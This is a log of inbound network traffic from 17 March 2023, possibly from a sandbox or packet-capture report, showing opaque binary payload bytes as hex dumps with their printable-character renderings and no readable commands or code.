2023-03-17 13:34:27 UTC	64	IN	Data Raw: d7 90 3c 87 e5 05 c3 0a fb a2 c3 8b 93 5a b1 5d ed 39 2d f3 3f 34 a0 f5 06 53 33 de cb 14 a1 00 0c 5f 5d 04 1f 9e ec 29 94 6f eb c8 16 37 ba 6f b2 f9 ea 81 12 e0 a8 1c ae 1f 32 ab 85 05 1e d5 30 9a b3 00 6f 83 ef e6 0f cc b5 8a dc 3a 25 c8 2f 65 d7 b8 cb 76 01 32 80 22 db 5a 96 00 f1 30 79 5d f9 ba d3 98 d3 4c 3f d9 a5 61 22 7d 51 53 f7 5a a9 63 78 18 65 e4 3f 00 de 2d c6 41 3a 4c 39 59 57 c7 05 90 97 83 c0 1f 96 58 fd 36 74 ec a8 cf 58 ec f6 6f 3e fc eb 8a 67 b6 13 a4 bf 8c 3e 55 19 80 76 f8 31 29 5c f1 e0 46 26 1b 65 0b c8 54 9b a6 a5 c3 a6 fb 84 dd cf 10 78 4a 6b ef 97 b8 a5 d3 9e 67 e6 28 e9 e9 1f a7 55 e2 ac 61 f5 0a c2 4f ec 26 96 0e 3f 87 ea ea 30 9d e7 1d c4 e7 cb 3d a1 ab 5a be c2 11 80 da 1f 06 e1 26 e5 28 4a ba 26 29 a4 92 38 3e f9 55 44 a7 cc Data Ascii: <Z]9-?4S3_])o7o20o:%/ev2"Z0y]L?a"}QSZcxe?-A:L9YWX6tXo>g>Uv1)\F&eTxJkg(UaO&?0=Z&(J&)8>UD
2023-03-17 13:34:27 UTC	65	IN	Data Raw: 28 ba 67 42 65 01 e9 ee 5c 2e 06 8c 2f db 1f cd 8c 59 40 e9 0b 90 74 c1 0d 6a 13 ab 29 1e 29 83 5f c5 04 aa 57 c8 ac b8 6a ff e9 0c 39 27 bd 92 73 be 0f 8d 29 b2 ab 93 8d d2 d9 d7 26 56 34 c0 37 d8 a7 44 b2 09 ef 91 31 77 16 cb a7 0f 01 24 9b 4c ce e9 e8 45 5a 23 2c 8a 55 2e 72 48 0d 5d Data Ascii: (gBe\./Y@tj))_Wj9's)&V47D1w$LEZ#,U.rH]
2023-03-17 13:34:27 UTC	65	IN	Data Raw: 5b c5 cf 89 8d 77 b2 95 8c 69 2e b4 fe b6 80 c8 cc a9 42 9b 4b 1a 6f b2 2b 1c e9 10 5e a8 ce dc a8 63 66 6f 19 9b 75 09 57 fb 7a 1b 84 11 cf 6f 08 b8 77 bc 94 bb 4e 2c 3a 54 66 d2 b1 0e 7b 8f b6 fd 3b 9f 55 dd ca 69 4f 72 6c af b9 a7 4b 74 76 5c b1 02 62 af c4 bd 36 bf 8d 3d 33 b0 87 29 55 74 81 bc 9c fe c2 f4 da 32 bd a1 e3 68 ad 8f 93 e5 30 2c 61 fe 8c 1e 2a e3 60 9c 49 46 1c f8 f2 a7 1c 21 d1 94 e9 34 0a 6b 03 5f d5 6a 83 79 a6 39 a8 bc 48 fb 98 5d e0 4d ea 40 d3 b8 c9 f9 36 a5 64 3f 1e 30 26 50 c8 48 a8 f7 c4 b4 80 d0 a1 56 12 c7 27 02 55 73 20 a1 e2 f1 28 fc b8 81 e5 83 80 90 c4 6a 79 66 1d a0 76 3c 39 09 10 aa 12 1c b4 11 2d 3a a2 9a 61 14 3d 8a c0 ce df bc ad 96 ef 13 38 01 ec be c3 8b b2 19 bd 4c eb 15 38 1c 3d 04 f4 f6 05 7d 40 f4 dd 12 71 17 04 Data Ascii: [wi.BKo+^cfouWzowN,:Tf{;UiOrlKtv\b6=3)Ut2h0,a*`IF!4k_jy9H]M@6d?0&PHV'Us (jyfv<9-:a=8L8=}@q
2023-03-17 13:34:27 UTC	66	IN	Data Raw: 2a a4 96 03 6d f9 7e 68 36 d4 49 48 a1 5a 36 28 7d 94 70 d2 1f a6 79 af 88 65 c2 53 6e c5 4f 68 b3 2a 5c f6 a3 0f 5d 33 04 e5 a2 6e 13 7a ab ff 9e a4 ed 5d 3e 03 5a 2b 9f de fa 7e c6 3f 4b 94 fc 5e 39 6b e2 e3 37 07 7e 2c 93 12 b7 e0 be 90 7e 53 96 7a f9 d0 bb d9 80 3e e2 0c 02 f0 2b 84 c6 27 fc bf 77 76 c3 8c 4a 61 4e e0 13 31 36 dd 39 b4 6f 41 07 a6 ff 82 8f 08 bb 60 09 8a bd 0d f4 62 98 52 04 06 c1 ab 9a a1 73 d8 95 8e 70 52 f9 f0 43 ec 17 4f 00 16 9d 15 e5 4b 4c 7b 67 95 86 0f 01 50 0e 65 36 e5 9c b3 99 80 1c 3c a1 02 d7 75 f7 c3 0e 99 54 51 9e 3c 44 74 33 4f 25 0f 55 91 11 19 d7 4b 2e 88 fe 8c f7 45 e1 8b 79 9b 71 3a 60 dc 6c 04 ea 76 ae f2 32 64 e8 d5 44 34 fd 51 74 61 c7 e6 d2 37 68 01 3e ce 74 9c 88 4b 42 d7 79 ca 75 c7 18 6b fc bf 55 5d 39 85 75 Data Ascii: m~h6IHZ6(}pyeSnOh\]3nz]>Z+~?K^9k7~,~Sz>+'wvJaN169oA`bRspRCOKL{gPe6<uTQ<Dt3O%UK.Eyq:`lv2dD4Qta7h>tKByukU]9u
2023-03-17 13:34:27 UTC	68	IN	Data Raw: f9 98 5d 4a 4a ea 40 ce ab c9 f9 f1 85 64 3f 10 34 26 50 c8 49 a8 f7 c6 bd 80 d0 25 56 12 c7 08 1f 55 73 93 a7 e2 f1 27 fb b8 81 e5 81 80 90 c4 6a 79 e0 0c a1 76 3c fc 08 10 ac d4 f3 bf 87 26 3c a2 a3 3f 7e 26 81 db 17 c3 8c 21 90 ef 10 43 97 f7 a5 c3 ff 93 08 a3 46 e1 d0 2c d2 23 16 f9 8b 1f 01 09 ff dd 39 b9 60 12 46 8b 12 1b d3 f2 32 93 d9 a6 d1 12 36 b7 a1 a0 73 64 86 01 36 a7 5e 8c 2b 33 45 9c be 04 ac b4 ce aa 7e 5e 99 fe a0 7d 77 a0 80 d6 a9 38 8b bf 6e d7 d4 f8 54 05 2a 91 d2 a6 6f 83 16 da 77 69 38 ea b0 c2 e0 f6 74 3b c3 ca d1 03 67 4a 59 2b dc ad 3c 43 13 65 58 2c 0c cd 34 d2 d9 a8 7c 2c 53 46 c9 1b 82 11 9a d5 f3 b2 5f e1 4c 67 6c b4 96 2c c0 f7 fa 24 d4 b1 81 67 42 0d 01 b8 93 51 df 16 32 66 da 6b ad 53 45 e5 54 37 33 05 8e df 5e 9d e3 b3 6c Data Ascii: ]JJ@d?4&PI%VUs'jyv<&<?~&!CF,#9`F26sd6^+3E~^}w8nT*owi8t;gJY+<CeX,4\|,SF_Lgl,$gBQ2fkSET73^l
2023-03-17 13:34:27 UTC	69	IN	Data Raw: 9f 3a 07 9d 6a e4 4b 4c 71 6c 97 f5 cc 30 0b 3f 6c 36 e6 b4 28 99 80 16 31 a8 04 84 ae c6 cb 0e 92 5f 5a 88 3b 4c ea 5a 14 36 a6 7b 96 11 0a d3 b6 3b a4 ff 8c f5 87 f9 75 6c bf 71 3c 62 c7 69 17 96 ef ae 7a 2d 76 ed df 39 a9 fd 41 70 76 c3 ef 5c c1 15 9a 3e c3 70 89 8d 4e 46 c1 50 91 74 f3 22 69 3b b3 46 53 28 9a 59 ed 5f bb 57 99 86 85 55 cf 86 31 38 3b bb 81 6b a3 82 ef 15 3a 81 bb 9b ab 03 92 26 27 96 e5 20 dc 86 af a6 1c 9d 21 19 57 66 69 83 06 10 bd 1f 46 e2 96 d9 6f 5a 76 8e ad 4f 3f 6a 5d 31 41 29 c7 ee b8 fd 45 9a 14 8c 69 24 ea f5 c8 8b f5 cc 9c 53 19 63 5e 6f b2 21 31 fb 10 5e a1 ce fe bc e3 b0 7f 0c 8a 61 4e 41 75 13 a4 80 3b d5 d8 12 87 3e 43 6b 02 62 7b 3b 59 60 cd cf 3c 7b 8e b3 82 bc 62 66 71 fe 7f 64 5b 7e 19 91 25 4b 74 7c 51 ae 13 7e de Data Ascii: :jKLql0?l6(1_Z;LZ6{;ulq<biz-v9Apv\>pNFPt"i;FS(Y_WU18;k:&' !WfiFoZvO?j]1A)Ei$Sc^o!1^aNAu;>Ckb{;Y`<{bfqd[~%Kt\|Q~
2023-03-17 13:34:27 UTC	70	IN	Data Raw: c0 29 5f 96 c7 66 d6 b2 bd 6e ff 20 90 33 5a 55 79 00 db 23 74 8b 18 ba c3 88 49 46 c1 c9 cc 66 5b 79 36 51 7d cb 2e 0f 3c 1a 33 62 85 10 a2 3d d4 79 1b 5c 54 5b 40 d4 3b 99 67 93 d3 6d 08 41 00 47 61 fa 35 fb d8 af f1 6f b9 d0 dc 89 61 b0 88 b7 53 98 50 10 5e b5 19 d2 6a 28 b8 c7 8b 5d 36 0e a3 17 b2 57 9c b5 a3 f6 55 c7 85 dd 9f 1d 07 3a 0c b6 39 ff 83 f5 88 76 a1 a4 45 f2 6b 1c 9e f2 0b c1 d6 13 1c 53 99 01 8a 7c b7 a0 3d 98 94 b8 d0 2d 55 46 e8 21 6a ee ac bc b4 b3 62 52 f0 06 ed 35 4b 5c ae ba 20 2d 1e 8e ff 78 ff 55 eb 32 10 63 9c a1 8a 1c d4 55 84 58 43 1d 60 68 bd 9d 9d f4 82 7c d0 67 ff ac a3 55 e4 8a 22 62 72 03 f5 b6 c1 00 ad d7 66 9e ac e2 a3 2b 70 fa bf 8b 41 d2 39 c6 50 54 53 a8 5e 39 bd 8f 81 36 06 74 3a 85 e8 c5 5b e2 62 08 94 d0 7b f9 01 Data Ascii: )_fn 3ZUy#tIFf[y6Q}.<3b=y\T[@;gmAGa5oaSP^j(]6WU:9vEkS\|=-UF!jbR5K\ -xU2cUXC`h\|gU"brf+pA9PTS^96t:[b{
2023-03-17 13:34:27 UTC	71	IN	Data Raw: 98 16 b8 12 39 69 d4 9b cf 64 c7 79 b1 af 53 3f c2 d2 28 41 29 86 f8 89 fc fb a9 17 91 69 d0 9f e8 c8 8b c8 dd ad 1b be 5a 5d 70 b2 d5 a4 e2 10 5e ac df cd 3e 5d 89 7d 2e 8a 95 20 44 75 13 e5 91 02 2c 41 2b 83 38 43 d3 7d 66 7b 3b 54 71 f4 a6 95 3a 8e 99 92 3c a4 55 d7 d9 72 72 60 6f 88 db 2e 65 74 c4 74 ad 13 7e 87 8a bc 72 80 fa 3c 13 ab 97 9c 54 74 8b af 97 ef 55 e1 6a ed 86 b3 1c aa bb 9c 93 e5 3d 43 c9 d4 db 15 1c 3f 08 a1 97 56 39 d0 d0 a7 35 0c 95 8b df 1c c6 56 03 55 0b 6a 95 53 c6 4c ff bd 7c fb 58 60 4a 4d ea 40 d8 b8 ab c8 a6 a4 52 3f f4 0d 26 50 c8 48 be f7 e4 8a d7 d1 13 57 3a f9 08 02 55 73 85 a0 bc dc 70 fd 8e 81 e5 bc 80 90 c4 6a 6f 66 85 87 21 3d ca 08 10 95 d4 1d b4 11 2b 3a d4 bd 72 15 0b 8b db c1 dc bc 34 96 f9 13 6f 3e bb ae f5 8b 9a Data Ascii: 9idyS?(A)iZ]p^>]}. Du,A+8C}f{;Tq:<Urr`o.ett~r<TtUj=C?V95VUjSL\|X`JM@R?&PHW:Uspjof!=+:r4o>
2023-03-17 13:34:27 UTC	73	IN	Data Raw: c5 ee 30 f3 b4 68 a4 b0 c1 a8 51 7f 06 eb 35 f3 50 49 64 31 32 b7 f7 10 38 99 55 4e 27 c7 67 92 4b 4d 23 39 21 85 20 9e 18 b7 6a bc 9b 6d 78 59 60 d3 12 ba 03 4a 56 e5 8a 1e 72 17 9a ec a9 7f 70 7a 3d 07 9e a4 e9 4c 2d 79 f2 54 08 ae a5 38 c6 5e 41 bc a8 5f 3f 75 84 75 3c 07 03 2c e2 66 c5 5a e2 90 0f 7b dc 5e dc d8 e4 8d 71 5f e4 8c 95 f0 2a 80 fc 9b d2 bd 09 08 6c ef 4a 65 21 6d 13 31 fc d5 73 21 14 41 ef b7 31 de 8f 78 92 67 65 9b 9c 0f e7 01 73 73 02 0c ea ab fa 88 21 d4 84 be 08 52 04 94 43 ec 73 4f 01 0f be 6b ee 4a 30 71 6c 97 f5 81 03 50 02 71 3f fc 76 28 e5 80 16 31 a8 8c bd 5d be c1 24 9a 66 5a f6 3b 4d fa 5a 67 36 0e 13 98 31 02 95 b7 b8 a1 fe 8c f5 57 e7 75 2a b1 5e 33 47 cc ec 12 df ce ae f2 36 76 eb ca 30 b5 f7 51 f8 73 c2 cd 5c 5e 15 9a 2f Data Ascii: 0hQ5PId128UN'gKM#9! jmxY`JVrpz=L-yT8^A_?uu<,fZ{^q_lJe!m1s!A1xgess!RCsOkJ0qlPq?v(1]$fZ;MZg61Wu^3G6v0Qs\^/
2023-03-17 13:34:27 UTC	74	IN	Data Raw: 98 1c f8 c2 16 52 1c 5a 6b 03 43 0b 10 ba 6c e7 a6 a8 bc 4a fb 98 dd 4a 5c ca be e4 fc ca 2a f1 e5 d9 3f 10 30 26 46 c8 4a 82 d2 c5 6e 80 28 98 57 12 c7 08 14 55 1e ad 9f e2 2a 27 88 7a 81 e5 83 80 86 c4 34 4a 70 1d 7b 76 dc 3e 08 10 aa d4 0b b4 55 16 6d a1 46 25 74 f9 8b db fe dc aa 34 6a c8 f8 59 df ec b3 04 8b 9a 49 bd 5a e1 02 26 dd 36 c2 f9 a0 ce 55 15 f5 dd 02 a1 26 2c 77 8b c9 17 db 28 38 93 e1 82 20 12 e4 9b 41 bf 0a 44 e0 d1 ee b9 12 97 2b 33 15 bb ee 19 78 b4 33 92 0a 7c 93 fe e0 60 e4 8b b5 d6 f7 34 d3 7b 64 d7 b2 d8 75 10 f8 a7 5d b5 81 96 a8 fb 23 76 83 f7 ac c2 65 c2 7b 2e 16 ca a8 f3 7d 5b 53 2b 5a a6 e9 78 77 64 3d 2c 93 1a 3e d2 79 bd 5a 39 53 6f c2 15 64 0d d0 06 6d bd 59 fd 50 67 69 96 31 37 4e f7 9f eb d4 b1 8b 67 a6 00 b4 ee 8f 50 f1 Data Ascii: RZkClJJ\?0&FJn(WU'z4Jp{v>UmF%t4jYIZ&6U&,w(8 AD+3x3\|`4{du]#ve{.}[S+Zxwd=,>yZ9SodmYPgi17NgP
2023-03-17 13:34:27 UTC	75	IN	Data Raw: 01 99 52 02 0a e2 d0 9a 46 70 d1 8f 21 57 52 10 f0 43 ea 7b 75 06 ce 9e 61 e5 e3 6f 71 6c 97 f5 87 08 1b 02 a4 35 ed b5 9b ba 80 16 31 a8 8a b6 bf fd 0b 0d 98 5e e4 ab 3b 4d fa 5a 61 3d f4 50 56 12 00 d2 70 18 a1 fe 8c f5 51 ec 6b 6a 7b 72 36 63 01 4a 12 97 ef ae f4 3e 5a eb 1f 3a a2 fc 89 53 73 c2 ef 5c 4f 0d 95 25 f1 70 83 8c 59 46 c1 51 11 74 d1 3e 38 2b b9 42 56 29 83 59 ed 5e 2b 57 d8 9f c9 5d e6 82 35 39 0f b5 80 6a a3 82 a3 29 c6 9d a4 9f b0 02 6d 28 27 96 e5 20 df be a9 ab 0b 99 38 18 77 66 69 82 96 10 25 19 17 c7 85 dd 76 5b 5b 81 ae 4e 3f 6a fc 28 b1 0f a5 ea 9a fc 69 88 17 8c 69 24 b1 e8 b3 b9 de cd b9 52 5d 70 5d 6f b2 21 8a e2 3b 67 84 ca d8 bd 74 b0 7c 0d 89 61 1e 5c 7c 08 27 81 1a d4 7e 12 82 1f 40 6b 02 65 51 32 61 64 ee ce 96 7b 8f b2 91 Data Ascii: RFp!WRC{uaoql51^;MZa=PVpQkj{r6cJ>Z:Ss\O%pYFQt>8+BV)Y^+W]59j)m(' 8wfi%v[[N?j(ii$R]p]o!;gt\|a\\|'~@keQ2ad{
2023-03-17 13:34:27 UTC	76	IN	Data Raw: e6 24 33 ab 87 05 ff b6 b4 9b b2 0a 30 b7 fe f6 62 47 90 9a d6 29 35 bb d3 77 d7 b2 da 64 82 2c 91 33 b7 5f f1 07 da 23 72 83 73 bf c2 88 fe 44 57 da ca 60 20 7d 90 5b 2b 4b a5 0c 68 0e 65 e2 28 13 84 1a d2 79 bc 4c 40 4a 46 d4 15 84 ae 82 d5 6d bc 59 5e 54 67 fa b8 da 94 bd f7 6f 39 d4 12 99 67 b0 01 b3 65 91 51 10 1a 80 4e c7 6b 28 5f f7 bf 7a 37 0e 0b 3c 58 47 9d b5 bd de 79 cc 84 dd cf 35 bc 27 0d b6 95 c8 70 f1 89 76 fe 8a 07 f9 6d 1c 7f e2 e2 d4 d0 13 d0 58 02 27 8c 7c 0a a6 05 88 92 b8 f9 0c 42 49 ee 21 d2 e8 37 9a b2 b3 aa 59 6c 26 eb 35 f2 56 8a b2 26 2d b7 84 2e 6f f9 55 4d 27 8b 45 98 a1 5b 3c 78 6a 85 78 fc 18 45 5d bc bd 66 e9 29 58 d1 67 be b3 03 52 e5 8a 1f 74 fa 29 f4 b6 7f 06 d9 e2 67 9e a5 e9 97 10 71 da 75 9f f4 f5 38 c6 3c 41 ea 9e 5f Data Ascii: $30bG)5wd,3_#rsDW` }[+Khe(yL@JFmY^Tgo9geQNk(_z7<XGy5'pvmX'\|BI!7Yl&5V&-.oUM'E[<xjxE]f)XgRt)gqu8<A_
2023-03-17 13:34:27 UTC	77	IN	Data Raw: 9e a0 9d 81 26 26 97 e5 da cd be e6 95 11 1a 0a 19 77 65 69 f1 36 10 33 38 69 2e 9f d9 64 58 53 09 8f 4e 3f 69 ea 4b 62 29 86 ef 89 20 e7 9a 16 8d 69 19 96 e8 c8 8a c8 57 8b 53 8d 62 5c ed 89 21 9c e3 10 b3 80 ce cd bd 74 25 48 0d 8a 60 18 82 50 13 e5 81 02 1b 47 1d 82 4e 43 7f 44 37 7b 9a 54 32 f8 c5 96 b2 8f bb 89 5b 9d 84 d7 d0 69 6e 60 a7 b4 98 34 a9 70 95 4f a4 08 9a 85 6d bc 3f a2 4f 3f d8 ab a6 bb b0 76 8a ae 88 f4 3b db 32 ed bb a8 1c 94 aa 9d 9a fe cf 41 79 ff 85 0f 1b 3a 41 9d 9e 4d dd d2 ef a6 15 30 26 88 d8 1d 53 70 e7 57 4a 6b 8a 48 52 70 e1 bd 43 e0 4c 58 13 4c e3 5b c4 b8 a8 f8 f8 be 6e 3f 79 31 2f 4b c2 48 d9 f6 cf af 64 d2 5c 56 1b dc 30 04 d4 72 9a bb e8 f1 ae fd b1 9a ef 83 11 91 cd 71 73 66 85 a1 7f 27 4d 0f b9 ab dd 06 50 13 8c 3b ab Data Ascii: &&wei638i.dXSN?iKb) iWSb\!t%H`PGNCD7{T2[in`4pOm?O?v;2Ay:AM0&SpWJkHRpCLXL[n?y1/KHd\V0rqsf'MP;
2023-03-17 13:34:27 UTC	79	IN	Data Raw: 06 de c2 d4 e3 cc bc 4c 02 88 bd 2d 42 e8 93 91 b1 e7 6c d7 44 ea da cd 94 77 8f b6 ba b3 db 13 4a eb eb f6 c2 4d b3 22 24 ae 60 12 71 fd 98 5a 16 c2 e0 98 02 43 a6 37 5c 81 94 df ff b4 63 b8 ea 78 76 4d 76 d5 24 bd 15 26 57 e1 d8 12 7e 1f b8 f7 9e 68 ca 76 bc 63 32 b8 3b 40 5a 75 f1 68 08 ae ab 3c ef 20 70 bf 51 5e 51 72 55 62 27 07 b3 39 62 0b 44 5e bd 8b e8 77 b1 7e ba c8 1d 8d e0 3a ce ac 1b f0 62 84 b1 a4 10 b3 22 0c 5d 97 a6 69 78 69 c7 39 ce d1 d6 27 66 5a ef d8 68 da 5d 6d 68 6b 80 8e ec 1f 7f 03 e0 56 bf 28 e2 a6 35 89 84 c4 b8 bd dd 50 fe fc 2d ed 42 4b 09 1c 79 69 9d 4e a2 7d 57 9a 84 81 df 41 93 69 47 e7 fc 2e d8 8d bf 31 a1 97 7c 5c 59 c6 07 88 12 55 29 3f fa db 50 67 14 0d 0f bb 32 00 4a b1 32 ba 1a 8e 6c 53 36 69 e3 bf d8 3e 9d c7 fe 12 6e Data Ascii: L-BlDwJM"$`qZC7\cxvMv$&W~hvc2;@Zuh< pQ^QrUb'9bD^w~:b"]ixi9'fZh]mhkV(5P-BKyiN}WAiG.1\|\YU)?Pg2J2lS6i>n
2023-03-17 13:34:27 UTC	80	IN	Data Raw: 62 bb f8 91 e7 2b 32 61 45 8d 1c 2a 93 61 f2 94 5e 39 60 c7 d4 1f 29 c2 17 ea a7 5b 42 03 f6 0b 8e 86 7d e7 66 a8 07 4e d5 98 46 4a 89 ee 6e ce 9b c9 10 f5 8b 64 14 10 c2 22 7e c8 7b a8 e4 c3 9a 80 eb 25 44 17 e9 08 41 55 81 97 8e e2 ba 27 e5 bd af e5 d0 80 83 c1 44 79 3d 1c b3 73 12 fc 6b 10 9c d1 33 b4 7a 3d 5a a7 b4 25 67 3d e6 de be dc 37 34 f8 ec 53 59 82 ec 74 c6 c8 9a 32 bd f7 e4 56 27 61 36 c7 fc bd 06 f6 15 00 d8 77 a1 6a 04 f3 8e 74 17 0c e4 e3 96 88 82 95 12 2d b1 fe bf 5f 44 e6 02 6d b9 81 97 53 30 28 85 9e 19 c8 b7 18 b3 71 7c 28 fb 7f 60 e4 b5 9c d0 89 34 30 aa 0a d4 11 d8 e7 10 fb 94 90 b4 f4 96 40 dc 8a 76 20 f7 9e c4 48 ff cf 2e a7 c9 a1 22 ce 5b 3d 28 88 a6 8f 56 c2 60 21 2c b8 c8 a7 d4 99 bd c7 39 37 45 35 14 3f 0d fe d6 8c bd ea fd 28 Data Ascii: b+2aE*a^9`)[B}fNFJnd"~{%DAU'Dy=sk3z=Z%g=74SYt2V'a6wjt-_DmS0(q\|(`40@v H."[=(V`!,97E5?(
2023-03-17 13:34:27 UTC	81	IN	Data Raw: f1 1b 66 47 4d 6c a1 24 6f 31 b0 8c 78 bb dc 09 e4 95 2f b3 ba 99 3c 01 4c c2 10 9c e5 70 b8 a6 05 74 3c 13 70 6b 57 73 21 03 a7 b5 d0 e4 24 4f b1 44 2c f5 ef 03 b0 2c d2 36 89 b7 29 b0 3b 16 5f ab ac 97 e6 f8 ac 0d d3 76 e3 88 55 4e 9a 73 dc 35 60 56 1b 38 b0 d3 db 38 01 d7 37 f5 39 e7 b5 45 09 71 54 61 2e 40 a9 97 81 ad Data Ascii: fGMl$o1x/<Lpt<pkWs!$OD,,6);_vUNs5`V8879EqTa.@
2023-03-17 13:34:27 UTC	81	IN	Data Raw: f2 1c cd ed bc 3a 8e d7 ea 70 1d c1 af 76 e5 15 f4 3d 6e 5d 35 8d 37 45 01 7c 2a 74 a9 1d 9d 2f 05 46 35 2b 83 77 56 5e c5 54 ee 91 1b 7b 84 85 7b 16 9c bb ef 69 8c 82 91 28 87 aa 87 9a 97 03 bc 27 b4 96 44 21 68 be 47 96 a7 9d 8b 18 64 67 c8 83 03 11 92 38 76 d5 3a d8 4f 5b f2 8f 98 4f 9e 6b eb 28 4b 29 86 ee a4 fd d4 9a 1d 8c 69 24 89 e8 c9 8b e8 cc ad 53 a2 63 eb 67 0e 29 5d ea d6 56 67 c6 1d b4 6a b9 5b 04 a1 68 28 4d 41 1a df 89 4d dc 15 1b fb 16 3d 62 dc 6f e6 32 96 69 10 c6 65 72 85 b8 8e b6 b0 5f 80 d3 0a 6e e8 74 71 9b f2 40 4e 77 33 a6 80 75 3f 97 76 3d 62 a0 23 2d 89 a3 90 58 d9 87 a0 8c dc d2 9e 36 bf bf ce f5 00 b6 55 9e 32 26 a7 6d 17 81 02 24 1e 6e a7 99 0f 37 b6 c8 d9 12 a5 cc 2c e7 af 54 d4 0d 9a 05 b6 8d 5b e8 43 a7 c4 45 70 97 be 45 46 Data Ascii: :pv=n]57E\|*t/F5+wV^T{{i('D!hGdg8v:O[Ok(K)i$Scg)]Vgj[h(MAM=bo2ier_ntq@Nw3u?v=b#-X6U2&m$n7,T[CEpEF
2023-03-17 13:34:27 UTC	82	IN	Data Raw: fa db 4c af 68 6e 39 d4 f2 8a 1a b0 c2 ad af 99 12 11 67 80 78 d4 6a 28 5c f6 36 5e d6 2c 08 3c c9 55 5a b5 1e fc 29 c4 c4 dc 07 35 bc 3e 0e b6 d4 c9 cc f6 1f 73 fd 8a 8f f0 a0 1c 6c c0 d8 c3 d0 12 1c 58 7a 20 8e 7c 0e a7 3b 9a 23 b4 fe 0c dc 44 3d 21 21 cb 79 be f1 b2 87 58 ad 07 ef 35 b0 57 70 bb 72 0e b1 84 53 79 ca 54 0e 04 c3 61 d9 a0 07 3d 02 4c 80 58 bd 19 e8 6b a0 84 60 e9 02 7e b0 66 9c 96 2f 56 a6 8b 7d 75 27 24 f1 b6 3e 07 1f d4 70 ba a1 e9 0f 2a 16 fb 50 bb ab d2 7b c7 56 40 1f 89 5a 39 2e 8c 05 37 92 55 29 82 41 c4 b3 e3 77 0a 7d d0 7a f8 73 91 00 a5 39 e4 cf 94 5b 29 60 a6 be fc ff 72 b9 56 15 6e 62 21 6d 13 d6 3e 75 43 21 6f 41 02 3d 33 93 86 7a 93 27 08 61 94 ae 9c 03 99 12 03 e1 e8 39 9b 89 73 d8 8f 51 76 71 03 f7 43 ec 72 be 02 48 8e 6c Data Ascii: Lhn9gxj(\6^,<UZ)5>slXz \|;#D=!!yX5WprSyTa=LXk`~f/V}u'$>p*P{V@Z9.7U)Aw}zs9[)`rVnb!m>uC!oA=3z'a9sQvqCrHl
2023-03-17 13:34:27 UTC	84	IN	Data Raw: 51 82 4a 88 d8 9c c1 b2 95 17 60 97 ad d7 3a cb b2 de f3 d8 55 8e 9f 35 23 23 28 cd e4 49 2d 00 0b 29 d4 66 2a c0 da eb 62 ef ed 7c 74 f2 f9 e6 54 50 c2 af e6 8a ab 86 7a bf f1 fa b1 96 5f 24 03 3d a2 ac df 43 46 87 60 3f bc 25 4e e3 d6 6f 7b 75 86 61 c2 48 7e 4e 86 d2 cb fd 41 6a 46 d5 32 dc 7d 07 89 4f d2 5d 99 de 39 db 21 07 74 a3 ba a5 a1 ab d3 84 ec c3 17 e9 e3 f7 18 0c 6f 6f 98 88 90 0c bb 49 55 14 f6 d4 bd a4 75 b0 b8 f2 80 f7 df c5 96 26 79 01 79 d4 29 5a 93 7a 7d f9 a1 7f d9 78 49 6f f0 d6 25 67 58 ff 84 98 b3 ce 59 c5 9a 71 34 68 98 fa 91 c7 9a 0b fe 1e b8 45 73 bd 77 49 ad bc 43 1b 41 bc 9e 55 f5 54 40 17 c8 5e 47 c7 a1 6a cc ac cd 72 57 7b fe 30 f9 9b 44 ca 42 bc e0 42 c3 62 7c ea c0 55 46 f6 f5 df f7 43 32 d4 a1 bf 2e 01 fa 8a 94 6a 66 e2 fa Data Ascii: QJ`:U5##(I-)f*b\|tTPz_$=CF`?%No{uaH~NAjF2}O]9!tooIUu&yy)Zz}xIo%gXYq4hEswICAUT@^GjrW{0DBBb\|UFC2.jf
2023-03-17 13:34:27 UTC	85	IN	Data Raw: ec ca 88 21 4e 37 93 12 f3 ca d2 4b a3 4b 1e c9 db 3a 4b 03 ec 03 53 41 1d 49 ee 63 c5 28 87 f3 61 09 b4 25 91 bf f2 e9 e4 4c bb ea fc 95 47 e4 b8 ed 99 de 17 5c 3b c9 24 01 21 3e 77 5f 58 dd 06 53 1f 24 6d b0 31 8c ea 1f fa 14 7d f8 ef 59 fa 6d ec 37 49 65 84 cf 9c d9 1c ad e0 da 74 1a 5d 9f 27 ec 00 2a 74 58 d0 0e 90 22 23 15 6c c3 94 f3 67 35 70 24 53 93 dc 46 fd 80 71 54 dc d3 fd 31 91 b2 6c fc 3e 2a ec 3b 0e 96 35 14 50 4d 39 f2 61 69 bc d4 49 c5 fe c3 85 32 8a 36 00 db 01 58 0d af 1b 76 97 88 cb 86 69 3d 88 ab 5b c1 9c 23 14 73 a5 8a 28 01 45 fb 4d bd 07 e1 ff 3d 46 b2 34 e5 2b 97 7f 0e 71 c9 29 29 4c 83 3e 88 2a f4 32 a0 dc d2 02 9a f2 5e 5c 77 da f2 19 d4 ed c0 4d b2 d9 d3 ef ff 66 e3 45 54 ef 95 54 ac da b6 f6 62 ee 5d 76 05 02 69 dd 66 71 40 4a Data Ascii: !N7KK:KSAIc(a%LG\;$!>w_XS$m1}Ym7Iet]'tX"#lg5p$SFqT1l>;5PM9aiI26Xvi=[#s(EM=F4+q))L>*2^\wMfETTb]vifq@J
2023-03-17 13:34:27 UTC	86	IN	Data Raw: 0f 79 25 73 ce 05 53 90 6d 51 da a4 71 dd 72 5c 4e cb f5 4b 56 5c f8 be fe 9d cc 44 fa 86 70 38 75 85 c0 ad d8 ff 3d c9 25 8f 72 54 a0 57 6f 9c f4 4a 16 74 86 b8 14 c6 74 70 17 d9 72 64 ff 8b 56 e0 84 82 61 77 46 e5 1b cc a4 2b e6 72 8b b9 55 f2 49 61 ce f6 75 76 c8 c7 fe b3 4c 15 ff 9b b5 0c 28 c6 ef d6 6d 5d c8 da 0b a4 d7 d8 37 64 52 c3 56 c2 3a e4 73 bf 23 35 f1 92 db b6 ed ff 00 62 85 8c 15 4c 1e 2f 3a 44 25 e2 69 3a 7c 02 83 58 76 c8 73 a7 15 c9 25 5a 38 35 a0 50 e1 61 f5 b2 0c c9 3c fd 0d 02 83 fd bf 5b ca 90 0e 4c b1 b1 cf 02 dc 65 d4 cf ed 34 51 6b f9 1e b3 38 5c 3d 83 96 5e 70 6b 7e 77 ac 2d ff da dd ac 4f 97 f0 bc ba 50 6e 7c 68 d4 e2 af 60 93 fb 34 8d e5 bb 82 0c 7e 11 87 8f b7 b1 67 b6 58 0b 67 e5 08 61 d4 a8 e8 fd cf 8f 6d be 29 8b 72 a7 89 Data Ascii: y%sSmQqr\NKV\Dp8u=%rTWoJttprdVawF+rUIauvL(m]7dRV:s#5bL/:D%i:\|Xvs%Z85Pa<[Le4Qk8\=^pk~w-OPn\|h`4~gXgam)r
